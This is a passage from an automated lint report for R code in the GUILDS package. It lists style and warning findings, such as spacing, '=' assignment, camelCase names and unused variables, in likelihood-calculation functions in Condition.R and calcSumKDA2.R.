^\n```\n[R/calcSumKDA2.R:11:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                  ^\n```\n[R/calcSumKDA2.R:11:44:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                                           ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt])\n           ^\n```\n[R/Condition.R:15:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt])\n                ^\n```\n[R/Condition.R:16:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt])\n                ^\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:36:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                  ~^~\n```\n[R/Condition.R:21:51:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                 ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n               ^\n```\n[R/Condition.R:23:47:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                              ^\n```\n[R/Condition.R:23:51:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                                  ^\n```\n[R/Condition.R:24:53:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L24) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (lgamma(theta_x / 2) + lgamma(theta_y / 2) )\n                                                    ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:3:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:35:39:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L35) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { \n    ^\n```\n[R/Condition.R:37:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { \n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:37:28:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L37) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { \n                           ^\n```\n[R/Condition.R:37:29:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(incorrectLength == 1) { \n                            ^\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:51:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:55:18:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:55:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:56:13:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:56:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:56:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:56:17:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:62:18:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:62:54:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:66:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:69:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin\n      ^\n```\n[R/Condition.R:70:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin\n      ^\n```\n[R/Condition.R:71:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0\n      ^\n```\n[R/Condition.R:72:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1\n      ^\n```\n[R/Condition.R:73:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps\n     ^\n```\n[R/Condition.R:75:2:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n ^~~~~~~~~~\n```\n[R/Condition.R:75:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n             ^\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:54:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:77:2:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n ^~~~~~~~~~~\n```\n[R/Condition.R:77:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n             ^\n```\n[R/Condition.R:77:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:52:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n                                                   ^\n```\n[R/Condition.R:85:32:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L85) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g, c(eps,xmax)))$root\n                               ^\n```\n[R/Condition.R:88:4:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:88:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:94:26:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L94) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot( h,c( xmax, 1 - eps)))$root\n                         ^\n```\n[R/Condition.R:97:2:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:104:24:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:111:14:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:118:3:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L118) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L118) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L119) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:119:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L119) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:120:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L120) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:121:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:122:3:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L122) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:122:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L122) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:123:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:126:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:128:55:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      ^\n```\n[R/Condition.R:130:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L130) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:130:45:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:131:50:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:133:50:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L133) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:133:51:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L133) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:134:6:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:134:45:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:137:49:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L137) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                            ~~~~^\n```\n[R/Condition.R:137:50:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L137) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                                 ^\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L142) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:143:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L145) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:151:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:152:72:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L152) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:152:73:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/Condition.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        